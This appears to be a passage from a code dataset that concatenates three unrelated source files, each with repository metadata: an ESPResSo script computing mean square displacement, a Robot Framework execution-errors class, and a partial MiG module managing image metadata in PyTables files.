# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# ESPResSo is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
"""
Measure mean square displacements using the Observables/Correlators framework.
"""
import numpy as np
import espressomd
import espressomd.observables
import espressomd.accumulators
# System setup
system = espressomd.System(box_l=[1.0, 1.0, 1.0])
system.set_random_state_PRNG()
#system.seed = system.cell_system.get_state()['n_nodes'] * [1234]
np.random.seed(seed=system.seed)
system.part.add(pos=(0, 0, 0), v=(1, 2, 3))
system.time_step = 0.01
system.cell_system.skin = 0
system.cell_system.set_n_square(use_verlet_lists=False)
system.thermostat.set_langevin(kT=1, gamma=10, seed=42)
system.integrator.run(1000)
# Initialize observable for a particle with id 0
p = espressomd.observables.ParticlePositions(ids=(0,))
# Ask the observable for its parameters
print(p.get_params())
# Calculate and return current value
print(p.calculate())
# Return stored current value
print(p.calculate())
# Instantiate a correlator correlating the p observable with itself,
# calculating the mean squared displacement (msd).
c = espressomd.accumulators.Correlator(
tau_lin=16, tau_max=1000, delta_N=1, obs1=p,
corr_operation="square_distance_componentwise", compress1="discard1")
# Instantiate a correlator calculating the FCS autocorrelation function from
# particle positions, using the symmetric focal spot with wx=wy=wz=10
# (sigma)
fcs = espressomd.accumulators.Correlator(
tau_lin=16, tau_max=10000, delta_N=10, obs1=p,
corr_operation="fcs_acf", args=[10, 10, 10], compress1="discard2")
# Ask the correlator for its parameters
print(c.get_params())
# Register the correlator for auto updating at the interval given by its
# dt (currently every timestep)
system.auto_update_accumulators.add(c)
system.auto_update_accumulators.add(fcs)
# Integrate
system.integrator.run(300000)
# Finalize the correlation calculation and write the results to a file
c.finalize()
np.savetxt("res.dat", c.result())
fcs.finalize()
np.savetxt("fcs.dat", fcs.result())
|
psci2195/espresso-ffans
|
samples/observables_correlators.py
|
Python
|
gpl-3.0
| 2,673
|
[
"ESPResSo"
] |
acce9531d9abd6ab8307951568170a88727d0b6d479828a8bc30f2bc58f8ad36
|
# Copyright 2008-2015 Nokia Solutions and Networks
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from robotide.lib.robot.model import ItemList
from robotide.lib.robot.utils import setter
from .message import Message
class ExecutionErrors(object):
"""Represents errors occurred during the execution of tests.
An error might be, for example, that importing a library has failed.
"""
message_class = Message
def __init__(self, messages=None):
#: A :class:`list-like object <robot.model.itemlist.ItemList>` of
#: :class:`~robot.model.message.Message` instances.
self.messages = messages
@setter
def messages(self, msgs):
return ItemList(self.message_class, items=msgs)
def add(self, other):
self.messages.extend(other.messages)
def visit(self, visitor):
visitor.visit_errors(self)
def __iter__(self):
return iter(self.messages)
def __len__(self):
return len(self.messages)
def __getitem__(self, index):
return self.messages[index]
|
fingeronthebutton/RIDE
|
src/robotide/lib/robot/result/executionerrors.py
|
Python
|
apache-2.0
| 1,569
|
[
"VisIt"
] |
77bc59288f92f17f9481002dd15f1366df603e2139cb75c00903191be4b79441
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
#
# --- BEGIN_HEADER ---
#
# imagemetaio - Managing MiG image meta data
# Copyright (C) 2003-2015 The MiG Project lead by Brian Vinter
#
# This file is part of MiG.
#
# MiG is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# MiG is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
#
# -- END_HEADER ---
#
"""Image meta data helper functions"""
import os
from tables import open_file
import tables.exceptions
from numpy import dtype, float32, float64, uint8, uint16, uint32, \
uint64, int8, int16, int32, int64, empty
from shared.fileio import acquire_file_lock, release_file_lock
import traceback
__metapath = '.meta'
__settings_filepath = os.path.join(__metapath, 'settings.h5')
__image_metapath = os.path.join(__metapath, 'image')
__image_preview_path = os.path.join(__image_metapath, 'preview')
allowed_image_types = ['raw', 'tiff']
allowed_settings_status = {
'ready': 'Ready',
'pending': 'Pending',
'updating': 'Updating',
'failed': 'Failed',
}
allowed_data_types = {
'float32': float32,
'float64': float64,
'uint8': uint8,
'uint16': uint16,
'uint32': uint32,
'uint64': uint64,
'int8': int8,
'int16': int16,
'int32': int32,
'int64': int64,
}
image_file_settings_ent = dtype([
('extension', 'S16'),
('settings_status', 'S8'),
('settings_update_progress', 'S16'),
('settings_recursive', bool),
('image_type', 'S8'),
('data_type', 'S8'),
('offset', uint64),
('x_dimension', uint64),
('y_dimension', uint64),
('preview_image_extension', 'S16'),
('preview_x_dimension', uint64),
('preview_y_dimension', uint64),
('preview_cutoff_min', float64),
('preview_cutoff_max', float64),
])
image_file_ent = dtype([
('extension', 'S16'),
('image_type', 'S8'),
('base_path', 'S4096'),
('path', 'S4096'),
('name', 'S4096'),
('data_type', 'S8'),
('offset', uint64),
('x_dimension', uint64),
('y_dimension', uint64),
('min_value', float64),
('max_value', float64),
('mean_value', float64),
('median_value', float64),
('file_md5sum', 'S4096'),
('preview_image_filepath', 'S4096'),
('preview_image_extension', 'S16'),
('preview_data_type', 'S8'),
('preview_x_dimension', uint64),
('preview_y_dimension', uint64),
('preview_cutoff_min', float64),
('preview_cutoff_max', float64),
('preview_image_scale', float64),
])
image_volume_settings_ent = dtype([
('extension', 'S16'),
('settings_status', 'S8'),
('settings_update_progress', 'S16'),
('settings_recursive', bool),
('image_type', 'S8'),
('data_type', 'S8'),
('volume_filepattern', 'S64'),
('offset', uint64),
('x_dimension', uint64),
('y_dimension', uint64),
('zdim', uint64),
('preview_x_dimension', uint64),
('preview_y_dimension', uint64),
('preview_zdim', uint64),
('preview_cutoff_min', float64),
('preview_cutoff_max', float64),
])
image_volume_ent = dtype([
('image_type', 'S8'),
('base_path', 'S4096'),
('path', 'S4096'),
('name', 'S4096'),
('extension', 'S16'),
('volume_filepattern', 'S64'),
('data_type', 'S8'),
('offset', uint64),
('x_dimension', uint64),
('y_dimension', uint64),
('zdim', uint64),
('min_value', float64),
('max_value', float64),
('mean_value', float64),
('median_value', float64),
('file_md5sum', 'S4096'),
('preview_data_type', 'S8'),
('preview_x_dimension', uint64),
('preview_y_dimension', uint64),
('preview_zdim', uint64),
('preview_cutoff_min', float64),
('preview_cutoff_max', float64),
('preview_image_scale', float64),
])
preview_image_settings = {
'image_type': 'png',
'extension': 'png',
'x_dimension': 256,
'y_dimension': 256,
}
preview_volume_settings = {
'image_type': 'raw',
'extension': 'raw',
'x_dimension': 256,
'y_dimension': 256,
'zdim': 256,
}
def __ensure_filepath(logger, filepath, makedirs=False):
"""Ensure that meta file path exists"""
result = None
if makedirs:
try:
os.makedirs(filepath)
except Exception, ex:
if not os.path.exists(filepath):
logger.debug('__ensure_filepath: %s' % str(ex))
if os.path.exists(filepath):
result = filepath
return result
def __get_settings_filepath(logger, base_path, makedirs=False):
"""Returns settings filepath, created if non-existent"""
result = None
metapath = os.path.join(base_path, __metapath)
if __ensure_filepath(logger, metapath, makedirs) is not None:
result = os.path.join(base_path, __settings_filepath)
return result
def __get_image_metapath(logger, base_path, makedirs=False):
"""Returns image meta path, created if non-existent"""
result = None
if __ensure_filepath(logger, base_path, makedirs) is not None:
image_metapath = os.path.join(base_path, __image_metapath)
result = __ensure_filepath(logger, image_metapath, makedirs)
return result
def __ensure_tables_format(logger, metafile):
"""Ensure that pytables in metafile has the correct structure"""
tables = metafile['tables']
root = tables.root
if not tables.__contains__('/settings'):
settings_group = tables.create_group('/', 'settings',
'Directory Settings Entries')
else:
settings_group = root.settings
if not tables.__contains__('/settings/image_file_types'):
tables.create_table(settings_group, 'image_file_types',
image_file_settings_ent, 'Image File Types')
if not tables.__contains__('/settings/image_volume_types'):
tables.create_table(settings_group, 'image_volume_types',
image_volume_settings_ent,
'Image Volume Types')
if not tables.__contains__('/image'):
image_group = tables.create_group('/', 'image',
'Directory Image Entries')
else:
image_group = root.image
if not tables.__contains__('/image/files'):
image_files_group = tables.create_group(image_group, 'files',
'Image Files')
else:
image_files_group = root.image.files
if not tables.__contains__('/image/files/meta'):
tables.create_table(image_files_group, 'meta', image_file_ent,
'Image Files Metadata')
if not tables.__contains__('/image/files/preview'):
image_files_preview_group = \
tables.create_group(image_files_group, 'preview',
'Image File Previews')
else:
image_files_preview_group = root.image.files.preview
if not tables.__contains__('/image/files/preview/data'):
image_files_preview_data_group = \
tables.create_group(image_files_preview_group, 'data',
'Image File Preview Data')
else:
image_files_preview_data_group = root.image.files.preview.data
if not tables.__contains__('/image/files/preview/histogram'):
image_files_preview_histogram_group = \
tables.create_group(image_files_preview_group, 'histogram',
'Image File Preview Histograms')
if not tables.__contains__('/image/volumes'):
image_volumes_group = tables.create_group(image_group, 'volumes'
, 'Image Volumes')
else:
image_volumes_group = root.image.volumes
if not tables.__contains__('/image/volumes/meta'):
tables.create_table(image_volumes_group, 'meta',
image_volume_ent, 'Image Volumes Metadata')
if not tables.__contains__('/image/volumes/preview'):
image_volumes_preview_group = \
tables.create_group(image_volumes_group, 'preview',
'Image Volume Previews')
else:
image_volumes_preview_group = root.image.volumes.preview
if not tables.__contains__('/image/volumes/preview/data'):
image_volumes_preview_data_group = \
tables.create_group(image_volumes_preview_group, 'data',
'Image Volume Preview Data')
else:
image_volumes_preview_data_group = \
root.image.volumes.preview.data
if not tables.__contains__('/image/volumes/preview/histogram'):
image_volumes_preview_histogram_group = \
tables.create_group(image_volumes_preview_group, 'histogram'
, 'Image Volume Preview Histograms')
else:
image_volumes_preview_histogram_group = \
root.image.volumes.preview.histogram
return tables
def __clean_image_preview_path(logger, base_path):
"""Clean image preview path"""
result = True
abs_preview_path = os.path.join(base_path, __image_preview_path)
if os.path.exists(abs_preview_path):
for file_ent in os.listdir(abs_preview_path):
# TODO: Uncomment action below when sure paths are correct
# os.remove(file_ent)
logger.info('imagefileio.py: (dry run) Removing preview file: %s'
% file_ent)
return result
def __open_image_settings_file(logger, base_path, makedirs=False):
"""Opens image settings file with exclusive lock.
NOTE: Locks are not consistently enforced through fuse"""
logger.debug('base_path: %s' % base_path)
metafile = None
if __ensure_filepath(logger, base_path, makedirs) is not None:
image_settings_filepath = __get_settings_filepath(logger,
base_path, makedirs)
logger.debug('image_settings_filepath: %s'
% image_settings_filepath)
if image_settings_filepath is not None:
metafile = {}
metafile['lock'] = __acquire_file_lock(logger,
image_settings_filepath)
if image_settings_filepath is not None:
if os.path.exists(image_settings_filepath):
filemode = 'r+'
else:
filemode = 'w'
try:
metafile['tables'] = \
open_file(image_settings_filepath,
mode=filemode,
title='Image directory meta-data file'
)
__ensure_tables_format(logger, metafile)
except Exception, ex:
logger.error("opening: '%s' in mode '%s'"
% (image_settings_filepath, filemode))
logger.error(traceback.format_exc())
__close_image_settings_file(logger, metafile)
metafile = None
return metafile
def __close_image_settings_file(logger, metafile):
"""Closes image settings file releasing exclusive lock.
NOTE: Locks are not consistently enforced through fuse"""
result = True
if metafile is not None:
if metafile.has_key('tables'):
try:
metafile['tables'].close()
except Exception, ex:
logger.error(traceback.format_exc())
result = False
if metafile.has_key('lock'):
try:
__release_file_lock(logger, metafile)
except Exception, ex:
logger.error(traceback.format_exc())
result = False
return result
def __acquire_file_lock(logger, image_settings_filepath):
"""Obtain lock.
NOTE: Locks are not consistently enforced through fuse"""
lock_path = '%s.lock' % image_settings_filepath
logger.debug('lock_path: %s' % lock_path)
return acquire_file_lock(lock_path)
def __release_file_lock(logger, metafile):
"""Release lock.
NOTE: Locks are not consistently enforced through fuse"""
result = True
lock_handle = metafile['lock']
logger.debug('lock_path: %s' % lock_handle.name)
release_file_lock(lock_handle)
return result
def __get_image_file_settings_node(logger, metafile):
"""Returns image file settings node"""
return metafile['tables'].root.settings.image_file_types
def __get_image_file_meta_node(logger, metafile):
"""Returns image file meta node"""
return metafile['tables'].root.image.files.meta
def __get_image_file_data_node(logger, metafile):
"""Returns image file data node"""
return metafile['tables'].root.image.files.preview.data
def __get_image_file_histogram_node(logger, metafile):
"""Returns image file histogram node"""
return metafile['tables'].root.image.files.preview.histogram
def __add_image_file_ent(
logger,
table_row,
extension,
image_type,
settings_status=None,
settings_update_progress=None,
settings_recursive=None,
data_type=None,
base_path=None,
path=None,
name=None,
offset=0,
x_dimension=0,
y_dimension=0,
min_value=0,
max_value=0,
mean_value=0,
median_value=0,
file_md5sum=None,
preview_image_filepath=None,
preview_image_extension=None,
preview_data_type=None,
preview_x_dimension=0,
preview_y_dimension=0,
preview_cutoff_min=0,
preview_cutoff_max=0,
preview_image_scale=0,
update=False,
settings=False,
):
"""Add image setting or file entry"""
if not image_type in allowed_image_types:
logger.error("Image_type: '%s' not in allowed: %s'"
% (image_type, allowed_image_types))
return None
if settings and image_type == 'raw':
if offset is None and x_dimension is None and y_dimension \
is None and data_type is None:
msg = "settings for: '%s', image_type: '%s'" % (extension,
image_type)
msg = \
'%s missing offset, x_dimension, y_dimension and data_type' \
% msg
logger.warning(msg)
table_row['extension'] = extension
table_row['image_type'] = image_type
table_row['data_type'] = data_type
table_row['offset'] = offset
table_row['x_dimension'] = x_dimension
table_row['y_dimension'] = y_dimension
table_row['preview_image_extension'] = preview_image_extension
table_row['preview_x_dimension'] = preview_x_dimension
table_row['preview_y_dimension'] = preview_y_dimension
table_row['preview_cutoff_min'] = preview_cutoff_min
table_row['preview_cutoff_max'] = preview_cutoff_max
if settings == True:
table_row['settings_status'] = settings_status
table_row['settings_update_progress'] = settings_update_progress
table_row['settings_recursive'] = settings_recursive
else:
table_row['base_path'] = base_path
table_row['path'] = path
table_row['name'] = name
table_row['min_value'] = min_value
table_row['max_value'] = max_value
table_row['mean_value'] = mean_value
table_row['median_value'] = median_value
table_row['file_md5sum'] = file_md5sum
table_row['preview_image_filepath'] = preview_image_filepath
table_row['preview_data_type'] = preview_data_type
table_row['preview_image_scale'] = preview_image_scale
if update:
table_row.update()
else:
table_row.append()
logger.debug('added table_row: %s' % str(table_row))
return table_row
def __get_row_idx_list(logger, table, condition):
"""Get a list of row indexes from *table*, based
on *condition*, if condition is '' return all row indexes"""
logger.debug("condition: '%s'" % condition)
if condition is None or condition == '':
row_list = [i for i in xrange(table.nrows)]
else:
row_list = table.get_where_list(condition)
return row_list
def __remove_row(
logger,
metafile,
table,
row_idx,
):
"""Remove row with index *row_idx* from *table*"""
result = None
nodepath = table._v_pathname
# If last row, delete and re-create table structure to get around:
# PyTables NotImplementedError: You are trying to delete all the rows in table
# This is not supported right now due to limitations on the underlying HDF5 library
if table.nrows > 1:
logger.debug('row_idx: %s' % row_idx)
table.remove_row(row_idx)
result = table
else:
logger.debug('rebuild settings_table')
table._f_remove(recursive=True, force=True)
__ensure_tables_format(logger, metafile)
result = metafile['tables'].get_node(nodepath)
return result
def __remove_image_files(
logger,
metafile,
base_path,
path=None,
name=None,
extension=None,
):
"""Remove image files, based on *path*, *name* and *extension*"""
status = False
removed = []
logger.debug('base_path: %s, path: %s, name: %s, extension: %s'
% (base_path, path, name, extension))
if metafile is not None:
image_file_table = __get_image_file_meta_node(logger, metafile)
condition = ''
if path is not None:
condition = '%s & (path == b"%s")' % (condition, path)
if name is not None:
condition = '%s & (name == b"%s")' % (condition, name)
if extension is not None:
condition = '%s & (extension == b"%s")' % (condition,
extension)
condition = condition.replace(' & ', '', 1)
row_list = __get_row_idx_list(logger, image_file_table,
condition)
logger.debug('Removing #%s row(s)' % len(row_list))
status = True
while status and len(row_list) > 0:
row_idx = row_list[0]
table_row = image_file_table[row_idx]
row_base_path = table_row['base_path']
row_path = table_row['path']
row_name = table_row['name']
row_preview_image_filepath = \
table_row['preview_image_filepath']
if __remove_image_file_preview(
logger,
metafile,
row_base_path,
row_path,
row_name,
row_preview_image_filepath,
):
if row_path != '':
removed.append('%s/%s' % (row_base_path.strip('/'),
row_name.strip('/')))
else:
removed.append('%s/%s/%s' % (row_base_path.strip('/'
), row_path.strip('/'),
row_name.strip('/')))
image_file_table = __remove_row(logger, metafile,
image_file_table, row_idx)
row_list = __get_row_idx_list(logger, image_file_table,
condition)
else:
status = False
logger.debug('status: %s, removed: %s' % (str(status),
str(removed)))
return (status, removed)
def __remove_image_file_preview(
logger,
metafile,
base_path,
path,
name,
preview_image_filepath,
):
"""Remove image preview file, data and histogram"""
result = False
image_data_group = __get_image_file_data_node(logger, metafile)
image_histogram_group = __get_image_file_histogram_node(logger,
metafile)
image_filepath = os.path.join(path, name)
image_array_name = image_filepath.replace('/', '|')
# Remove preview image
abs_preview_image_filepath = os.path.join(base_path,
os.path.join(__image_preview_path, preview_image_filepath))
logger.debug('removing preview image: %s'
% abs_preview_image_filepath)
if os.path.exists(abs_preview_image_filepath):
os.remove(abs_preview_image_filepath)
# Remove preview data
if image_data_group.__contains__(image_array_name):
logger.debug('removing preview data: %s' % image_array_name)
image_data_group.__getattr__(image_array_name).remove()
else:
logger.debug('missing preview data: %s' % image_array_name)
# Remove histogram data
if image_histogram_group.__contains__(image_array_name):
logger.debug('removing preview histogram: %s'
% image_array_name)
image_histogram_group.__getattr__(image_array_name).remove()
else:
logger.debug('missing preview histogram: %s' % image_array_name)
result = True
return result
def __get_image_file_preview_data(
logger,
metafile,
path,
filename,
):
"""Returns handle to preview data table array"""
result = None
if metafile is not None:
data_group = __get_image_file_data_node(logger, metafile)
image_filepath = os.path.join(path, filename)
name = image_filepath.replace('/', '|')
try:
result = data_group.__getattr__(name)
logger.debug('type: %s, data_ent: %s, %s, %s'
% (type(result), result.dtype, result.shape,
result))
except tables.exceptions.NoSuchNodeError:
result = None
return result
def __get_image_file_preview_histogram_data(
logger,
metafile,
path,
filename,
):
"""Returns handle to preview histogram table array"""
result = None
if metafile is not None:
histogram_group = __get_image_file_histogram_node(logger,
metafile)
image_filepath = os.path.join(path, filename)
name = image_filepath.replace('/', '|')
try:
result = histogram_group.__getattr__(name)
logger.debug('type: %s, data_ent: %s, %s, %s'
% (type(result), result.dtype, result.shape,
result))
except tables.exceptions.NoSuchNodeError:
result = None
return result
def get_preview_image_url(logger, base_url, filepath):
"""Returns VGrid image url for generated preview image file"""
return '%s/%s/%s' % (base_url, __image_preview_path.strip('/'),
filepath)
def to_ndarray(logger, tables_array, out=None):
"""Converts table array to ndarray, this issues a copy"""
logger.debug('type: %s, dir: %s' % (type(tables_array),
dir(tables_array)))
if out is None:
result = empty(tables_array.shape, tables_array.dtype)
else:
result = out
result[:] = tables_array
return result
def add_image_file_setting(
logger,
base_path,
extension,
settings_status,
settings_update_progress,
settings_recursive,
image_type,
data_type=None,
offset=0,
x_dimension=0,
y_dimension=0,
preview_image_extension=None,
preview_x_dimension=0,
preview_y_dimension=0,
preview_cutoff_min=0,
preview_cutoff_max=0,
overwrite=False,
):
"""Add image file setting to metadata"""
result = False
metafile = __open_image_settings_file(logger, base_path,
makedirs=True)
if metafile is not None:
settings_table = __get_image_file_settings_node(logger,
metafile)
condition = 'extension == b"%s"' % extension
row_list = __get_row_idx_list(logger, settings_table, condition)
if not overwrite and len(row_list) > 0 or overwrite \
and len(row_list) > 1:
logger.debug('Image settings for files with extension: "%s" allready exists, #settings: %s'
% (extension, len(row_list)))
else:
if overwrite and len(row_list) == 1:
rows = settings_table.where(condition)
update = True
else:
rows = [settings_table.row]
update = False
result = True
for row in rows:
table_row = __add_image_file_ent(
logger,
row,
extension,
image_type,
settings_status=settings_status,
settings_update_progress=settings_update_progress,
settings_recursive=settings_recursive,
data_type=data_type,
offset=offset,
x_dimension=x_dimension,
y_dimension=y_dimension,
preview_image_extension=preview_image_extension,
preview_x_dimension=preview_x_dimension,
preview_y_dimension=preview_y_dimension,
preview_cutoff_min=preview_cutoff_min,
preview_cutoff_max=preview_cutoff_max,
update=update,
settings=True,
)
if table_row is None:
result = False
__close_image_settings_file(logger, metafile)
return result
def remove_image_file_setting(logger, base_path, extension):
"""Remove image file setting"""
return remove_image_file_settings(logger, base_path, extension)
def remove_image_file_settings(logger, base_path, extension=None):
"""Remove image file settings"""
logger.debug('base_path: %s, extension: %s' % (base_path,
extension))
status = False
removed = []
metafile = __open_image_settings_file(logger, base_path)
if metafile is not None:
status = True
settings_table = __get_image_file_settings_node(logger,
metafile)
condition = ''
if extension is not None:
condition = 'extension == b"%s"' % extension
row_list = __get_row_idx_list(logger, settings_table, condition)
logger.debug('row_list: %s' % row_list)
while status and len(row_list) > 0:
logger.debug('row_list: %s' % row_list)
row_idx = row_list[0]
(status_files, _) = __remove_image_files(logger, metafile,
base_path, extension=extension)
if status_files:
logger.debug('settings_table.nrows: %s'
% settings_table.nrows)
removed.append(settings_table[row_idx]['extension'])
settings_table = __remove_row(logger, metafile,
settings_table, row_idx)
row_list = __get_row_idx_list(logger, settings_table,
condition)
else:
status = False
__close_image_settings_file(logger, metafile)
logger.debug('status: %s, removed: %s' % (str(status),
str(removed)))
return (status, removed)
def add_image_file(
logger,
base_path,
path,
name,
extension,
image_type,
data_type,
offset,
x_dimension,
y_dimension,
min_value,
max_value,
mean_value,
median_value,
file_md5sum,
preview_image_filepath,
preview_image_extension,
preview_data_type,
preview_x_dimension,
preview_y_dimension,
preview_cutoff_min,
preview_cutoff_max,
preview_image_scale,
overwrite=False,
):
"""Add image file entry to meta data"""
result = False
logger.debug('x_dimension: %s, y_dimension: %s, data_type: %s'
% (x_dimension, y_dimension, data_type))
metafile = __open_image_settings_file(logger, base_path)
if metafile is not None:
image_file_table = __get_image_file_meta_node(logger, metafile)
condition = 'name == b"%s"' % name
row_list = __get_row_idx_list(logger, image_file_table,
condition)
if not overwrite and len(row_list) > 0 or overwrite \
and len(row_list) > 1:
logger.debug("'%s' for path: '%s' allready exists, #entries: %s"
% (name, base_path, len(row_list)))
else:
if overwrite and len(row_list) == 1:
rows = image_file_table.where(condition)
update = True
else:
rows = [image_file_table.row]
update = False
for row in rows:
__add_image_file_ent(
logger,
row,
extension,
image_type,
None,
None,
None,
data_type,
base_path,
path,
name,
offset,
x_dimension,
y_dimension,
min_value,
max_value,
mean_value,
median_value,
file_md5sum,
preview_image_filepath,
preview_image_extension,
preview_data_type,
preview_x_dimension,
preview_y_dimension,
preview_cutoff_min,
preview_cutoff_max,
preview_image_scale,
update=update,
settings=False,
)
result = True
__close_image_settings_file(logger, metafile)
return result
def remove_image_files(
logger,
base_path,
path=None,
name=None,
extension=None,
):
"""Remove image files"""
logger.debug('base_path: %s, path: %s, name: %s, extension: %s'
% (base_path, path, name, extension))
metafile = __open_image_settings_file(logger, base_path)
(result, removed) = __remove_image_files(
logger,
metafile,
base_path,
path,
name,
extension,
)
__close_image_settings_file(logger, metafile)
return (result, removed)
def get_image_file_setting(logger, base_path, extension):
"""Get image file setting"""
logger.debug('base_path: %s, extension: %s' % (base_path,
extension))
result = None
settings_result = get_image_file_settings(logger, base_path,
extension)
if settings_result is not None:
if len(settings_result) == 1:
result = settings_result[0]
elif len(settings_result) > 1:
logger.warning('expected result of length 0 or 1, got: %s'
% len(result))
return result
def update_image_file_setting(logger, base_path, setting):
"""Update image file setting"""
return add_image_file_setting(
logger,
base_path,
setting['extension'],
setting['settings_status'],
setting['settings_update_progress'],
setting['settings_recursive'],
setting['image_type'],
setting['data_type'],
setting['offset'],
setting['x_dimension'],
setting['y_dimension'],
setting['preview_image_extension'],
setting['preview_x_dimension'],
setting['preview_y_dimension'],
setting['preview_cutoff_min'],
setting['preview_cutoff_max'],
overwrite=True,
)
def get_image_file_settings(logger, base_path, extension=None):
"""Get image file settings"""
logger.debug('base_path: %s, extension: %s' % (base_path,
extension))
result = None
metafile = __open_image_settings_file(logger, base_path)
if metafile is not None:
result = []
image_settings_table = __get_image_file_settings_node(logger,
metafile)
condition = ''
if extension is not None:
condition = 'extension == b"%s" ' % extension
row_list = __get_row_idx_list(logger, image_settings_table,
condition)
for row_idx in row_list:
entry = {}
entry['extension'] = \
image_settings_table[row_idx]['extension']
entry['settings_status'] = \
image_settings_table[row_idx]['settings_status']
entry['settings_update_progress'] = \
image_settings_table[row_idx]['settings_update_progress'
]
entry['settings_recursive'] = \
image_settings_table[row_idx]['settings_recursive']
entry['image_type'] = \
image_settings_table[row_idx]['image_type']
entry['data_type'] = \
image_settings_table[row_idx]['data_type']
entry['offset'] = image_settings_table[row_idx]['offset']
entry['x_dimension'] = \
image_settings_table[row_idx]['x_dimension']
entry['y_dimension'] = \
image_settings_table[row_idx]['y_dimension']
entry['preview_image_extension'] = \
image_settings_table[row_idx]['preview_image_extension']
entry['preview_x_dimension'] = \
image_settings_table[row_idx]['preview_x_dimension']
entry['preview_y_dimension'] = \
image_settings_table[row_idx]['preview_y_dimension']
entry['preview_cutoff_min'] = \
image_settings_table[row_idx]['preview_cutoff_min']
entry['preview_cutoff_max'] = \
image_settings_table[row_idx]['preview_cutoff_max']
result.append(entry)
__close_image_settings_file(logger, metafile)
return result
def get_image_file(
logger,
base_path,
path,
name,
):
"""Get image file"""
result = None
result_list = get_image_files(logger, base_path, path, name,
extension=None)
if result_list is not None:
if len(result_list) == 1:
result = result_list[0]
elif len(result_list) > 1:
logger.warning('expected result of length 0 or 1, got: %s'
% len(result))
return result
def get_image_files(
logger,
base_path,
path=None,
name=None,
extension=None,
):
"""Get list of image file entries"""
result = None
logger.debug('base_path: %s, path: %s, name: %s, extension: %s'
% (base_path, path, name, extension))
metafile = __open_image_settings_file(logger, base_path)
if metafile is not None:
image_file_table = __get_image_file_meta_node(logger, metafile)
condition = ''
if path is not None:
condition = '%s & (path == b"%s")' % (condition, path)
if name is not None:
condition = '%s & (name == b"%s")' % (condition, name)
if extension is not None:
condition = '%s & (extension == b"%s")' % (condition,
extension)
condition = condition.replace(' & ', '', 1)
row_list = __get_row_idx_list(logger, image_file_table,
condition)
logger.debug('#rows: %s' % len(row_list))
result = []
for row_idx in row_list:
entry = {}
entry['image_type'] = image_file_table[row_idx]['image_type'
]
entry['base_path'] = image_file_table[row_idx]['base_path']
entry['path'] = image_file_table[row_idx]['path']
entry['name'] = image_file_table[row_idx]['name']
entry['extension'] = image_file_table[row_idx]['extension']
entry['data_type'] = image_file_table[row_idx]['data_type']
entry['offset'] = image_file_table[row_idx]['offset']
entry['x_dimension'] = \
image_file_table[row_idx]['x_dimension']
entry['y_dimension'] = \
image_file_table[row_idx]['y_dimension']
entry['min_value'] = image_file_table[row_idx]['min_value']
entry['max_value'] = image_file_table[row_idx]['max_value']
entry['mean_value'] = image_file_table[row_idx]['mean_value'
]
entry['median_value'] = \
image_file_table[row_idx]['median_value']
entry['file_md5sum'] = \
image_file_table[row_idx]['file_md5sum']
entry['preview_image_filepath'] = \
image_file_table[row_idx]['preview_image_filepath']
entry['preview_image_extension'] = \
image_file_table[row_idx]['preview_image_extension']
entry['preview_cutoff_min'] = \
image_file_table[row_idx]['preview_cutoff_min']
entry['preview_cutoff_max'] = \
image_file_table[row_idx]['preview_cutoff_max']
entry['preview_data_type'] = \
image_file_table[row_idx]['preview_data_type']
entry['preview_x_dimension'] = \
image_file_table[row_idx]['preview_x_dimension']
entry['preview_y_dimension'] = \
image_file_table[row_idx]['preview_y_dimension']
entry['preview_image_scale'] = \
image_file_table[row_idx]['preview_image_scale']
entry['preview_data'] = to_ndarray(logger,
__get_image_file_preview_data(logger, metafile,
entry['path'], entry['name']))
entry['preview_histogram'] = to_ndarray(logger,
__get_image_file_preview_histogram_data(logger,
metafile, entry['path'], entry['name']))
result.append(entry)
__close_image_settings_file(logger, metafile)
return result
def get_image_file_count(logger, base_path, extension=None):
"""Returns number of files currently in metadata"""
result = 0
metafile = __open_image_settings_file(logger, base_path)
if metafile:
image_file_table = __get_image_file_meta_node(logger, metafile)
if extension is not None:
condition = 'extension == b"%s"' % extension
row_list = __get_row_idx_list(logger, image_file_table,
condition)
result = len(row_list)
__close_image_settings_file(logger, metafile)
return result
def get_image_preview_path(
logger,
base_path,
path,
makedirs=False,
):
"""Returns image preview path, created if non-existent"""
logger.debug('base_path: %s, path: %s' % (base_path, path))
result = None
if __ensure_filepath(logger, base_path) is not None:
preview_path = os.path.join(__image_preview_path, path)
full_preview_path = os.path.join(base_path, preview_path)
if __ensure_filepath(logger, full_preview_path, makedirs) \
is not None:
result = preview_path
return result
def add_image_file_preview_data(
logger,
base_path,
path,
filename,
data,
):
"""Put *data* into a table array, created if non-existent"""
result = False
logger.debug('base_path: %s, path: %s, filename: %s, data: %s'
% (base_path, path, filename, data))
metafile = __open_image_settings_file(logger, base_path)
if metafile is not None:
data_group = __get_image_file_data_node(logger, metafile)
image_filepath = os.path.join(path, filename)
title = 'Resized and rescaled data for: %s' % image_filepath
name = image_filepath.replace('/', '|')
logger.debug('imagefileio.py: add_image_file_preview_data -> name: %s'
% name)
logger.debug('imagefileio.py: add_image_file_preview_data -> title: %s'
% title)
logger.debug('imagefileio.py: add_image_file_preview_data -> data: %s, %s'
% (data.dtype, str(data.shape)))
try:
data_ent = data_group.__getattr__(name)
data_ent[:] = data
except tables.exceptions.NoSuchNodeError:
data_ent = metafile['tables'].create_array(data_group,
name, obj=data, title=title)
logger.debug('tables data: %s, %s' % (data_ent.dtype,
